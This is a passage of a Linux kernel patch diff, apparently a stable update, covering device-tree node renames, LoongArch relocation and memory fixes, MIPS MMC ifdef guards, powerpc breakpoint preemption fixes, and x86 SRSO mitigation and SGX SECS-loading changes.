++	twl6040_pins: twl6040-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x19c, PIN_OUTPUT | MUX_MODE3)		/* fref_clk2_out.gpio_182 */
+ 			OMAP4_IOPAD(0x1a0, PIN_INPUT | MUX_MODE0)		/* sys_nirq2.sys_nirq2 */
+ 		>;
+ 	};
+ 
+-	tsc2004_pins: pinmux_tsc2004_pins {
++	tsc2004_pins: tsc2004-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x090, PIN_INPUT | MUX_MODE3)		/* gpmc_ncs4.gpio_101 (irq) */
+ 			OMAP4_IOPAD(0x092, PIN_OUTPUT | MUX_MODE3)		/* gpmc_ncs5.gpio_102 (rst) */
+ 		>;
+ 	};
+ 
+-	uart3_pins: pinmux_uart3_pins {
++	uart3_pins: uart3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x140, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart3_cts_rctx.uart3_cts_rctx */
+ 			OMAP4_IOPAD(0x142, PIN_OUTPUT | MUX_MODE0)		/* uart3_rts_sd.uart3_rts_sd */
+@@ -88,7 +88,7 @@
+ 		>;
+ 	};
+ 
+-	hsusbb1_pins: pinmux_hsusbb1_pins {
++	hsusbb1_pins: hsusbb1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0c2, PIN_INPUT_PULLDOWN | MUX_MODE4)	/* usbb1_ulpitll_clk.usbb1_ulpiphy_clk */
+ 			OMAP4_IOPAD(0x0c4, PIN_OUTPUT | MUX_MODE4)		/* usbb1_ulpitll_stp.usbb1_ulpiphy_stp */
+@@ -105,27 +105,27 @@
+ 		>;
+ 	};
+ 
+-	hsusbb1_phy_rst_pins: pinmux_hsusbb1_phy_rst_pins {
++	hsusbb1_phy_rst_pins: hsusbb1-phy-rst-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x18c, PIN_OUTPUT | MUX_MODE3)		/* kpd_row2.gpio_177 */
+ 		>;
+ 	};
+ 
+-	i2c1_pins: pinmux_i2c1_pins {
++	i2c1_pins: i2c1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x122, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_scl */
+ 			OMAP4_IOPAD(0x124, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_sda */
+ 		>;
+ 	};
+ 
+-	i2c3_pins: pinmux_i2c3_pins {
++	i2c3_pins: i2c3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12a, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_scl */
+ 			OMAP4_IOPAD(0x12c, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_sda */
+ 		>;
+ 	};
+ 
+-	mmc1_pins: pinmux_mmc1_pins {
++	mmc1_pins: mmc1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0e2, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc1_clk.sdmmc1_clk */
+ 			OMAP4_IOPAD(0x0e4, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc1_cmd.sdmmc1_cmd */
+@@ -144,19 +144,19 @@
+ 		&lan7500_rst_pins
+ 	>;
+ 
+-	hsusbb1_phy_clk_pins: pinmux_hsusbb1_phy_clk_pins {
++	hsusbb1_phy_clk_pins: hsusbb1-phy-clk-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x058, PIN_OUTPUT | MUX_MODE0)	/* fref_clk3_out */
+ 		>;
+ 	};
+ 
+-	hsusbb1_hub_rst_pins: pinmux_hsusbb1_hub_rst_pins {
++	hsusbb1_hub_rst_pins: hsusbb1-hub-rst-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x042, PIN_OUTPUT | MUX_MODE3)	/* gpio_wk1 */
+ 		>;
+ 	};
+ 
+-	lan7500_rst_pins: pinmux_lan7500_rst_pins {
++	lan7500_rst_pins: lan7500-rst-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x040, PIN_OUTPUT | MUX_MODE3)	/* gpio_wk0 */
+ 		>;
+diff --git a/arch/arm/boot/dts/omap443x.dtsi b/arch/arm/boot/dts/omap443x.dtsi
+index 238aceb799f89..2104170fe2cd7 100644
+--- a/arch/arm/boot/dts/omap443x.dtsi
++++ b/arch/arm/boot/dts/omap443x.dtsi
+@@ -69,6 +69,7 @@
+ };
+ 
+ &cpu_thermal {
++	thermal-sensors = <&bandgap>;
+ 	coefficients = <0 20000>;
+ };
+ 
+diff --git a/arch/arm/boot/dts/omap4460.dtsi b/arch/arm/boot/dts/omap4460.dtsi
+index 1b27a862ae810..a6764750d4476 100644
+--- a/arch/arm/boot/dts/omap4460.dtsi
++++ b/arch/arm/boot/dts/omap4460.dtsi
+@@ -79,6 +79,7 @@
+ };
+ 
+ &cpu_thermal {
++	thermal-sensors = <&bandgap>;
+ 	coefficients = <348 (-9301)>;
+ };
+ 
+diff --git a/arch/arm/boot/dts/omap5-cm-t54.dts b/arch/arm/boot/dts/omap5-cm-t54.dts
+index e62ea8b6d53fd..af288d63a26a4 100644
+--- a/arch/arm/boot/dts/omap5-cm-t54.dts
++++ b/arch/arm/boot/dts/omap5-cm-t54.dts
+@@ -84,36 +84,36 @@
+ 	};
+ 
+ 	lcd0: display {
+-                compatible = "startek,startek-kd050c", "panel-dpi";
+-                label = "lcd";
+-
+-                pinctrl-names = "default";
+-                pinctrl-0 = <&lcd_pins>;
+-
+-                enable-gpios = <&gpio8 3 GPIO_ACTIVE_HIGH>;
+-
+-                panel-timing {
+-                        clock-frequency = <33000000>;
+-                        hactive = <800>;
+-                        vactive = <480>;
+-                        hfront-porch = <40>;
+-                        hback-porch = <40>;
+-                        hsync-len = <43>;
+-                        vback-porch = <29>;
+-                        vfront-porch = <13>;
+-                        vsync-len = <3>;
+-                        hsync-active = <0>;
+-                        vsync-active = <0>;
+-                        de-active = <1>;
+-                        pixelclk-active = <1>;
+-                };
+-
+-                port {
+-                        lcd_in: endpoint {
+-                                remote-endpoint = <&dpi_lcd_out>;
+-                        };
+-                };
+-        };
++		compatible = "startek,startek-kd050c", "panel-dpi";
++		label = "lcd";
++
++		pinctrl-names = "default";
++		pinctrl-0 = <&lcd_pins>;
++
++		enable-gpios = <&gpio8 3 GPIO_ACTIVE_HIGH>;
++
++		panel-timing {
++			clock-frequency = <33000000>;
++			hactive = <800>;
++			vactive = <480>;
++			hfront-porch = <40>;
++			hback-porch = <40>;
++			hsync-len = <43>;
++			vback-porch = <29>;
++			vfront-porch = <13>;
++			vsync-len = <3>;
++			hsync-active = <0>;
++			vsync-active = <0>;
++			de-active = <1>;
++			pixelclk-active = <1>;
++		};
++
++		port {
++			lcd_in: endpoint {
++				remote-endpoint = <&dpi_lcd_out>;
++			};
++		};
++	};
+ 
+ 	hdmi0: connector0 {
+ 		compatible = "hdmi-connector";
+@@ -644,8 +644,8 @@
+ };
+ 
+ &usb3 {
+-       extcon = <&extcon_usb3>;
+-       vbus-supply = <&smps10_out1_reg>;
++	extcon = <&extcon_usb3>;
++	vbus-supply = <&smps10_out1_reg>;
+ };
+ 
+ &cpu0 {
+diff --git a/arch/arm/boot/dts/qcom-msm8974pro-sony-xperia-shinano-castor.dts b/arch/arm/boot/dts/qcom-msm8974pro-sony-xperia-shinano-castor.dts
+index 3f45f5c5d37b5..cc49bb777df8a 100644
+--- a/arch/arm/boot/dts/qcom-msm8974pro-sony-xperia-shinano-castor.dts
++++ b/arch/arm/boot/dts/qcom-msm8974pro-sony-xperia-shinano-castor.dts
+@@ -124,15 +124,15 @@
+ 
+ 		syna,startup-delay-ms = <10>;
+ 
+-		rmi-f01@1 {
++		rmi4-f01@1 {
+ 			reg = <0x1>;
+-			syna,nosleep = <1>;
++			syna,nosleep-mode = <1>;
+ 		};
+ 
+-		rmi-f11@11 {
++		rmi4-f11@11 {
+ 			reg = <0x11>;
+-			syna,f11-flip-x = <1>;
+ 			syna,sensor-type = <1>;
++			touchscreen-inverted-x;
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/twl6030_omap4.dtsi b/arch/arm/boot/dts/twl6030_omap4.dtsi
+index 5730e46b00677..64e38c7c8be70 100644
+--- a/arch/arm/boot/dts/twl6030_omap4.dtsi
++++ b/arch/arm/boot/dts/twl6030_omap4.dtsi
+@@ -19,7 +19,7 @@
+ };
+ 
+ &omap4_pmx_wkup {
+-	twl6030_wkup_pins: pinmux_twl6030_wkup_pins {
++	twl6030_wkup_pins: twl6030-wkup-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x054, PIN_OUTPUT | MUX_MODE2)		/* fref_clk0_out.sys_drm_msecure */
+ 		>;
+@@ -27,7 +27,7 @@
+ };
+ 
+ &omap4_pmx_core {
+-	twl6030_pins: pinmux_twl6030_pins {
++	twl6030_pins: twl6030-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x19e, WAKEUP_EN | PIN_INPUT_PULLUP | MUX_MODE0)	/* sys_nirq1.sys_nirq1 */
+ 		>;
+diff --git a/arch/arm64/boot/dts/freescale/Makefile b/arch/arm64/boot/dts/freescale/Makefile
+index 3ea9edc87909a..ac6f780dc1914 100644
+--- a/arch/arm64/boot/dts/freescale/Makefile
++++ b/arch/arm64/boot/dts/freescale/Makefile
+@@ -62,6 +62,7 @@ dtb-$(CONFIG_ARCH_MXC) += imx8mm-kontron-bl-osm-s.dtb
+ dtb-$(CONFIG_ARCH_MXC) += imx8mm-mx8menlo.dtb
+ dtb-$(CONFIG_ARCH_MXC) += imx8mm-nitrogen-r2.dtb
+ dtb-$(CONFIG_ARCH_MXC) += imx8mm-phyboard-polis-rdk.dtb
++dtb-$(CONFIG_ARCH_MXC) += imx8mm-prt8mm.dtb
+ dtb-$(CONFIG_ARCH_MXC) += imx8mm-tqma8mqml-mba8mx.dtb
+ dtb-$(CONFIG_ARCH_MXC) += imx8mm-var-som-symphony.dtb
+ dtb-$(CONFIG_ARCH_MXC) += imx8mm-venice-gw71xx-0x.dtb
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index c289bf0903b45..c9efcb894a52f 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -100,6 +100,14 @@
+ 		};
+ 	};
+ 
++	reserved-memory {
++		/* Cont splash region set up by the bootloader */
++		cont_splash_mem: framebuffer@9d400000 {
++			reg = <0x0 0x9d400000 0x0 0x2400000>;
++			no-map;
++		};
++	};
++
+ 	lt9611_1v8: lt9611-vdd18-regulator {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "LT9611_1V8";
+@@ -512,6 +520,7 @@
+ };
+ 
+ &mdss {
++	memory-region = <&cont_splash_mem>;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/configs/defconfig b/arch/arm64/configs/defconfig
+index 0b6af3348e791..623e9f308f38a 100644
+--- a/arch/arm64/configs/defconfig
++++ b/arch/arm64/configs/defconfig
+@@ -1050,7 +1050,6 @@ CONFIG_COMMON_CLK_FSL_SAI=y
+ CONFIG_COMMON_CLK_S2MPS11=y
+ CONFIG_COMMON_CLK_PWM=y
+ CONFIG_COMMON_CLK_VC5=y
+-CONFIG_COMMON_CLK_NPCM8XX=y
+ CONFIG_COMMON_CLK_BD718XX=m
+ CONFIG_CLK_RASPBERRYPI=m
+ CONFIG_CLK_IMX8MM=y
+diff --git a/arch/loongarch/include/asm/elf.h b/arch/loongarch/include/asm/elf.h
+index 7af0cebf28d73..b9a4ab54285c1 100644
+--- a/arch/loongarch/include/asm/elf.h
++++ b/arch/loongarch/include/asm/elf.h
+@@ -111,6 +111,15 @@
+ #define R_LARCH_TLS_GD_HI20			98
+ #define R_LARCH_32_PCREL			99
+ #define R_LARCH_RELAX				100
++#define R_LARCH_DELETE				101
++#define R_LARCH_ALIGN				102
++#define R_LARCH_PCREL20_S2			103
++#define R_LARCH_CFA				104
++#define R_LARCH_ADD6				105
++#define R_LARCH_SUB6				106
++#define R_LARCH_ADD_ULEB128			107
++#define R_LARCH_SUB_ULEB128			108
++#define R_LARCH_64_PCREL			109
+ 
+ #ifndef ELF_ARCH
+ 
+diff --git a/arch/loongarch/kernel/mem.c b/arch/loongarch/kernel/mem.c
+index 4a4107a6a9651..aed901c57fb43 100644
+--- a/arch/loongarch/kernel/mem.c
++++ b/arch/loongarch/kernel/mem.c
+@@ -50,7 +50,6 @@ void __init memblock_init(void)
+ 	}
+ 
+ 	memblock_set_current_limit(PFN_PHYS(max_low_pfn));
+-	memblock_set_node(0, PHYS_ADDR_MAX, &memblock.memory, 0);
+ 
+ 	/* Reserve the first 2MB */
+ 	memblock_reserve(PHYS_OFFSET, 0x200000);
+@@ -58,4 +57,7 @@ void __init memblock_init(void)
+ 	/* Reserve the kernel text/data/bss */
+ 	memblock_reserve(__pa_symbol(&_text),
+ 			 __pa_symbol(&_end) - __pa_symbol(&_text));
++
++	memblock_set_node(0, PHYS_ADDR_MAX, &memblock.memory, 0);
++	memblock_set_node(0, PHYS_ADDR_MAX, &memblock.reserved, 0);
+ }
+diff --git a/arch/loongarch/kernel/module.c b/arch/loongarch/kernel/module.c
+index 097595b2fc14b..4f1e6e55dc026 100644
+--- a/arch/loongarch/kernel/module.c
++++ b/arch/loongarch/kernel/module.c
+@@ -376,7 +376,7 @@ typedef int (*reloc_rela_handler)(struct module *mod, u32 *location, Elf_Addr v,
+ 
+ /* The handlers for known reloc types */
+ static reloc_rela_handler reloc_rela_handlers[] = {
+-	[R_LARCH_NONE ... R_LARCH_RELAX]		     = apply_r_larch_error,
++	[R_LARCH_NONE ... R_LARCH_64_PCREL]		     = apply_r_larch_error,
+ 
+ 	[R_LARCH_NONE]					     = apply_r_larch_none,
+ 	[R_LARCH_32]					     = apply_r_larch_32,
+diff --git a/arch/loongarch/kernel/numa.c b/arch/loongarch/kernel/numa.c
+index a13f92593cfda..f7ffce170213e 100644
+--- a/arch/loongarch/kernel/numa.c
++++ b/arch/loongarch/kernel/numa.c
+@@ -453,7 +453,7 @@ void __init paging_init(void)
+ 
+ void __init mem_init(void)
+ {
+-	high_memory = (void *) __va(get_num_physpages() << PAGE_SHIFT);
++	high_memory = (void *) __va(max_low_pfn << PAGE_SHIFT);
+ 	memblock_free_all();
+ 	setup_zero_pages();	/* This comes from node 0 */
+ }
+diff --git a/arch/mips/alchemy/devboards/db1000.c b/arch/mips/alchemy/devboards/db1000.c
+index 50de86eb8784c..3183df60ad337 100644
+--- a/arch/mips/alchemy/devboards/db1000.c
++++ b/arch/mips/alchemy/devboards/db1000.c
+@@ -164,6 +164,7 @@ static struct platform_device db1x00_audio_dev = {
+ 
+ /******************************************************************************/
+ 
++#ifdef CONFIG_MMC_AU1X
+ static irqreturn_t db1100_mmc_cd(int irq, void *ptr)
+ {
+ 	mmc_detect_change(ptr, msecs_to_jiffies(500));
+@@ -369,6 +370,7 @@ static struct platform_device db1100_mmc1_dev = {
+ 	.num_resources	= ARRAY_SIZE(au1100_mmc1_res),
+ 	.resource	= au1100_mmc1_res,
+ };
++#endif /* CONFIG_MMC_AU1X */
+ 
+ /******************************************************************************/
+ 
+@@ -432,8 +434,10 @@ static struct platform_device *db1x00_devs[] = {
+ 
+ static struct platform_device *db1100_devs[] = {
+ 	&au1100_lcd_device,
++#ifdef CONFIG_MMC_AU1X
+ 	&db1100_mmc0_dev,
+ 	&db1100_mmc1_dev,
++#endif
+ };
+ 
+ int __init db1000_dev_setup(void)
+diff --git a/arch/mips/alchemy/devboards/db1200.c b/arch/mips/alchemy/devboards/db1200.c
+index 76080c71a2a7b..f521874ebb07b 100644
+--- a/arch/mips/alchemy/devboards/db1200.c
++++ b/arch/mips/alchemy/devboards/db1200.c
+@@ -326,6 +326,7 @@ static struct platform_device db1200_ide_dev = {
+ 
+ /**********************************************************************/
+ 
++#ifdef CONFIG_MMC_AU1X
+ /* SD carddetects:  they're supposed to be edge-triggered, but ack
+  * doesn't seem to work (CPLD Rev 2).  Instead, the screaming one
+  * is disabled and its counterpart enabled.  The 200ms timeout is
+@@ -584,6 +585,7 @@ static struct platform_device pb1200_mmc1_dev = {
+ 	.num_resources	= ARRAY_SIZE(au1200_mmc1_res),
+ 	.resource	= au1200_mmc1_res,
+ };
++#endif /* CONFIG_MMC_AU1X */
+ 
+ /**********************************************************************/
+ 
+@@ -751,7 +753,9 @@ static struct platform_device db1200_audiodma_dev = {
+ static struct platform_device *db1200_devs[] __initdata = {
+ 	NULL,		/* PSC0, selected by S6.8 */
+ 	&db1200_ide_dev,
++#ifdef CONFIG_MMC_AU1X
+ 	&db1200_mmc0_dev,
++#endif
+ 	&au1200_lcd_dev,
+ 	&db1200_eth_dev,
+ 	&db1200_nand_dev,
+@@ -762,7 +766,9 @@ static struct platform_device *db1200_devs[] __initdata = {
+ };
+ 
+ static struct platform_device *pb1200_devs[] __initdata = {
++#ifdef CONFIG_MMC_AU1X
+ 	&pb1200_mmc1_dev,
++#endif
+ };
+ 
+ /* Some peripheral base addresses differ on the PB1200 */
+diff --git a/arch/mips/alchemy/devboards/db1300.c b/arch/mips/alchemy/devboards/db1300.c
+index ff61901329c62..d377e043b49f8 100644
+--- a/arch/mips/alchemy/devboards/db1300.c
++++ b/arch/mips/alchemy/devboards/db1300.c
+@@ -450,6 +450,7 @@ static struct platform_device db1300_ide_dev = {
+ 
+ /**********************************************************************/
+ 
++#ifdef CONFIG_MMC_AU1X
+ static irqreturn_t db1300_mmc_cd(int irq, void *ptr)
+ {
+ 	disable_irq_nosync(irq);
+@@ -632,6 +633,7 @@ static struct platform_device db1300_sd0_dev = {
+ 	.resource	= au1300_sd0_res,
+ 	.num_resources	= ARRAY_SIZE(au1300_sd0_res),
+ };
++#endif /* CONFIG_MMC_AU1X */
+ 
+ /**********************************************************************/
+ 
+@@ -767,8 +769,10 @@ static struct platform_device *db1300_dev[] __initdata = {
+ 	&db1300_5waysw_dev,
+ 	&db1300_nand_dev,
+ 	&db1300_ide_dev,
++#ifdef CONFIG_MMC_AU1X
+ 	&db1300_sd0_dev,
+ 	&db1300_sd1_dev,
++#endif
+ 	&db1300_lcd_dev,
+ 	&db1300_ac97_dev,
+ 	&db1300_i2s_dev,
+diff --git a/arch/parisc/include/asm/ropes.h b/arch/parisc/include/asm/ropes.h
+index 8e51c775c80a6..62399c7ea94a1 100644
+--- a/arch/parisc/include/asm/ropes.h
++++ b/arch/parisc/include/asm/ropes.h
+@@ -86,6 +86,9 @@ struct sba_device {
+ 	struct ioc		ioc[MAX_IOC];
+ };
+ 
++/* list of SBA's in system, see drivers/parisc/sba_iommu.c */
++extern struct sba_device *sba_list;
++
+ #define ASTRO_RUNWAY_PORT	0x582
+ #define IKE_MERCED_PORT		0x803
+ #define REO_MERCED_PORT		0x804
+diff --git a/arch/parisc/kernel/drivers.c b/arch/parisc/kernel/drivers.c
+index e7ee0c0c91d35..8f12b9f318ae6 100644
+--- a/arch/parisc/kernel/drivers.c
++++ b/arch/parisc/kernel/drivers.c
+@@ -924,9 +924,9 @@ static __init void qemu_header(void)
+ 	pr_info("#define PARISC_MODEL \"%s\"\n\n",
+ 			boot_cpu_data.pdc.sys_model_name);
+ 
++	#define p ((unsigned long *)&boot_cpu_data.pdc.model)
+ 	pr_info("#define PARISC_PDC_MODEL 0x%lx, 0x%lx, 0x%lx, "
+ 		"0x%lx, 0x%lx, 0x%lx, 0x%lx, 0x%lx, 0x%lx\n\n",
+-	#define p ((unsigned long *)&boot_cpu_data.pdc.model)
+ 		p[0], p[1], p[2], p[3], p[4], p[5], p[6], p[7], p[8]);
+ 	#undef p
+ 
+diff --git a/arch/parisc/kernel/irq.c b/arch/parisc/kernel/irq.c
+index b05055f3ba4b8..9ddb2e3970589 100644
+--- a/arch/parisc/kernel/irq.c
++++ b/arch/parisc/kernel/irq.c
+@@ -368,7 +368,7 @@ union irq_stack_union {
+ 	volatile unsigned int lock[1];
+ };
+ 
+-DEFINE_PER_CPU(union irq_stack_union, irq_stack_union) = {
++static DEFINE_PER_CPU(union irq_stack_union, irq_stack_union) = {
+ 		.slock = { 1,1,1,1 },
+ 	};
+ #endif
+diff --git a/arch/powerpc/kernel/hw_breakpoint.c b/arch/powerpc/kernel/hw_breakpoint.c
+index 8db1a15d7acbe..02436f80e60e2 100644
+--- a/arch/powerpc/kernel/hw_breakpoint.c
++++ b/arch/powerpc/kernel/hw_breakpoint.c
+@@ -505,11 +505,13 @@ void thread_change_pc(struct task_struct *tsk, struct pt_regs *regs)
+ 	struct arch_hw_breakpoint *info;
+ 	int i;
+ 
++	preempt_disable();
++
+ 	for (i = 0; i < nr_wp_slots(); i++) {
+ 		if (unlikely(tsk->thread.last_hit_ubp[i]))
+ 			goto reset;
+ 	}
+-	return;
++	goto out;
+ 
+ reset:
+ 	regs_set_return_msr(regs, regs->msr & ~MSR_SE);
+@@ -518,6 +520,9 @@ reset:
+ 		__set_breakpoint(i, info);
+ 		tsk->thread.last_hit_ubp[i] = NULL;
+ 	}
++
++out:
++	preempt_enable();
+ }
+ 
+ static bool is_larx_stcx_instr(int type)
+@@ -632,6 +637,11 @@ static void handle_p10dd1_spurious_exception(struct arch_hw_breakpoint **info,
+ 	}
+ }
+ 
++/*
++ * Handle a DABR or DAWR exception.
++ *
++ * Called in atomic context.
++ */
+ int hw_breakpoint_handler(struct die_args *args)
+ {
+ 	bool err = false;
+@@ -758,6 +768,8 @@ NOKPROBE_SYMBOL(hw_breakpoint_handler);
+ 
+ /*
+  * Handle single-step exceptions following a DABR hit.
++ *
++ * Called in atomic context.
+  */
+ static int single_step_dabr_instruction(struct die_args *args)
+ {
+@@ -815,6 +827,8 @@ NOKPROBE_SYMBOL(single_step_dabr_instruction);
+ 
+ /*
+  * Handle debug exception notifications.
++ *
++ * Called in atomic context.
+  */
+ int hw_breakpoint_exceptions_notify(
+ 		struct notifier_block *unused, unsigned long val, void *data)
+diff --git a/arch/powerpc/kernel/hw_breakpoint_constraints.c b/arch/powerpc/kernel/hw_breakpoint_constraints.c
+index a74623025f3ab..9e51801c49152 100644
+--- a/arch/powerpc/kernel/hw_breakpoint_constraints.c
++++ b/arch/powerpc/kernel/hw_breakpoint_constraints.c
+@@ -131,8 +131,13 @@ void wp_get_instr_detail(struct pt_regs *regs, ppc_inst_t *instr,
+ 			 int *type, int *size, unsigned long *ea)
+ {
+ 	struct instruction_op op;
++	int err;
+ 
+-	if (__get_user_instr(*instr, (void __user *)regs->nip))
++	pagefault_disable();
++	err = __get_user_instr(*instr, (void __user *)regs->nip);
++	pagefault_enable();
++
++	if (err)
+ 		return;
+ 
+ 	analyse_instr(&op, regs, *instr);
+diff --git a/arch/powerpc/perf/hv-24x7.c b/arch/powerpc/perf/hv-24x7.c
+index 33c23225fd545..7dda59923ed6a 100644
+--- a/arch/powerpc/perf/hv-24x7.c
++++ b/arch/powerpc/perf/hv-24x7.c
+@@ -1431,7 +1431,7 @@ static int h_24x7_event_init(struct perf_event *event)
+ 	}
+ 
+ 	domain = event_get_domain(event);
+-	if (domain >= HV_PERF_DOMAIN_MAX) {
++	if (domain  == 0 || domain >= HV_PERF_DOMAIN_MAX) {
+ 		pr_devel("invalid domain %d\n", domain);
+ 		return -EINVAL;
+ 	}
+diff --git a/arch/riscv/include/asm/errata_list.h b/arch/riscv/include/asm/errata_list.h
+index 19a771085781a..7d2675bb71611 100644
+--- a/arch/riscv/include/asm/errata_list.h
++++ b/arch/riscv/include/asm/errata_list.h
+@@ -100,7 +100,7 @@ asm volatile(ALTERNATIVE(						\
+  * | 31 - 25 | 24 - 20 | 19 - 15 | 14 - 12 | 11 - 7 | 6 - 0 |
+  *   0000001    01001      rs1       000      00000  0001011
+  * dcache.cva rs1 (clean, virtual address)
+- *   0000001    00100      rs1       000      00000  0001011
++ *   0000001    00101      rs1       000      00000  0001011
+  *
+  * dcache.cipa rs1 (clean then invalidate, physical address)
+  * | 31 - 25 | 24 - 20 | 19 - 15 | 14 - 12 | 11 - 7 | 6 - 0 |
+@@ -113,7 +113,7 @@ asm volatile(ALTERNATIVE(						\
+  *   0000000    11001     00000      000      00000  0001011
+  */
+ #define THEAD_inval_A0	".long 0x0265000b"
+-#define THEAD_clean_A0	".long 0x0245000b"
++#define THEAD_clean_A0	".long 0x0255000b"
+ #define THEAD_flush_A0	".long 0x0275000b"
+ #define THEAD_SYNC_S	".long 0x0190000b"
+ 
+diff --git a/arch/x86/include/asm/kexec.h b/arch/x86/include/asm/kexec.h
+index a3760ca796aa2..256eee99afc8f 100644
+--- a/arch/x86/include/asm/kexec.h
++++ b/arch/x86/include/asm/kexec.h
+@@ -208,8 +208,6 @@ int arch_kimage_file_post_load_cleanup(struct kimage *image);
+ #endif
+ #endif
+ 
+-typedef void crash_vmclear_fn(void);
+-extern crash_vmclear_fn __rcu *crash_vmclear_loaded_vmcss;
+ extern void kdump_nmi_shootdown_cpus(void);
+ 
+ #endif /* __ASSEMBLY__ */
+diff --git a/arch/x86/include/asm/reboot.h b/arch/x86/include/asm/reboot.h
+index bc5b4d788c08d..2551baec927d2 100644
+--- a/arch/x86/include/asm/reboot.h
++++ b/arch/x86/include/asm/reboot.h
+@@ -25,6 +25,8 @@ void __noreturn machine_real_restart(unsigned int type);
+ #define MRR_BIOS	0
+ #define MRR_APM		1
+ 
++typedef void crash_vmclear_fn(void);
++extern crash_vmclear_fn __rcu *crash_vmclear_loaded_vmcss;
+ void cpu_emergency_disable_virtualization(void);
+ 
+ typedef void (*nmi_shootdown_cb)(int, struct pt_regs*);
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 3a893ab398a01..263df737d5cd5 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -2414,7 +2414,7 @@ static void __init srso_select_mitigation(void)
+ 
+ 	switch (srso_cmd) {
+ 	case SRSO_CMD_OFF:
+-		return;
++		goto pred_cmd;
+ 
+ 	case SRSO_CMD_MICROCODE:
+ 		if (has_microcode) {
+@@ -2692,7 +2692,7 @@ static ssize_t srso_show_state(char *buf)
+ 
+ 	return sysfs_emit(buf, "%s%s\n",
+ 			  srso_strings[srso_mitigation],
+-			  (cpu_has_ibpb_brtype_microcode() ? "" : ", no microcode"));
++			  boot_cpu_has(X86_FEATURE_IBPB_BRTYPE) ? "" : ", no microcode");
+ }
+ 
+ static ssize_t cpu_show_common(struct device *dev, struct device_attribute *attr,
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index b723368dbc644..454cdf3418624 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1282,7 +1282,7 @@ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_AMD(0x15, RETBLEED),
+ 	VULNBL_AMD(0x16, RETBLEED),
+ 	VULNBL_AMD(0x17, RETBLEED | SMT_RSB | SRSO),
+-	VULNBL_HYGON(0x18, RETBLEED | SMT_RSB),
++	VULNBL_HYGON(0x18, RETBLEED | SMT_RSB | SRSO),
+ 	VULNBL_AMD(0x19, SRSO),
+ 	{}
+ };
+diff --git a/arch/x86/kernel/cpu/sgx/encl.c b/arch/x86/kernel/cpu/sgx/encl.c
+index 2c258255a6296..d5f76b996795f 100644
+--- a/arch/x86/kernel/cpu/sgx/encl.c
++++ b/arch/x86/kernel/cpu/sgx/encl.c
+@@ -235,6 +235,21 @@ static struct sgx_epc_page *sgx_encl_eldu(struct sgx_encl_page *encl_page,
+ 	return epc_page;
+ }
+ 
++/*
++ * Ensure the SECS page is not swapped out.  Must be called with encl->lock
++ * to protect the enclave states including SECS and ensure the SECS page is
++ * not swapped out again while being used.
++ */
++static struct sgx_epc_page *sgx_encl_load_secs(struct sgx_encl *encl)
++{
++	struct sgx_epc_page *epc_page = encl->secs.epc_page;
++
++	if (!epc_page)
++		epc_page = sgx_encl_eldu(&encl->secs, NULL);
++
++	return epc_page;
++}
++
+ static struct sgx_encl_page *__sgx_encl_load_page(struct sgx_encl *encl,
+ 						  struct sgx_encl_page *entry)
+ {
+@@ -248,11 +263,9 @@ static struct sgx_encl_page *__sgx_encl_load_page(struct sgx_encl *encl,
+ 		return entry;
+ 	}
+ 
+-	if (!(encl->secs.epc_page)) {
+-		epc_page = sgx_encl_eldu(&encl->secs, NULL);
+-		if (IS_ERR(epc_page))
+-			return ERR_CAST(epc_page);
+-	}
++	epc_page = sgx_encl_load_secs(encl);
++	if (IS_ERR(epc_page))
++		return ERR_CAST(epc_page);
+ 
+ 	epc_page = sgx_encl_eldu(entry, encl->secs.epc_page);
+ 	if (IS_ERR(epc_page))
+@@ -339,6 +352,13 @@ static vm_fault_t sgx_encl_eaug_page(struct vm_area_struct *vma,
+ 
+ 	mutex_lock(&encl->lock);
+ 
++	epc_page = sgx_encl_load_secs(encl);
++	if (IS_ERR(epc_page)) {
++		if (PTR_ERR(epc_page) == -EBUSY)
++			vmret = VM_FAULT_NOPAGE;
++		goto err_out_unlock;
++	}
++
+ 	epc_page = sgx_alloc_epc_page(encl_page, false);
+ 	if (IS_ERR(epc_page)) {
+ 		if (PTR_ERR(epc_page) == -EBUSY)
+diff --git a/arch/x86/kernel/crash.c b/arch/x86/kernel/crash.c
+index cdd92ab43cda4..54cd959cb3160 100644
+--- a/arch/x86/kernel/crash.c
++++ b/arch/x86/kernel/crash.c
+@@ -48,38 +48,12 @@ struct crash_memmap_data {
+ 	unsigned int type;
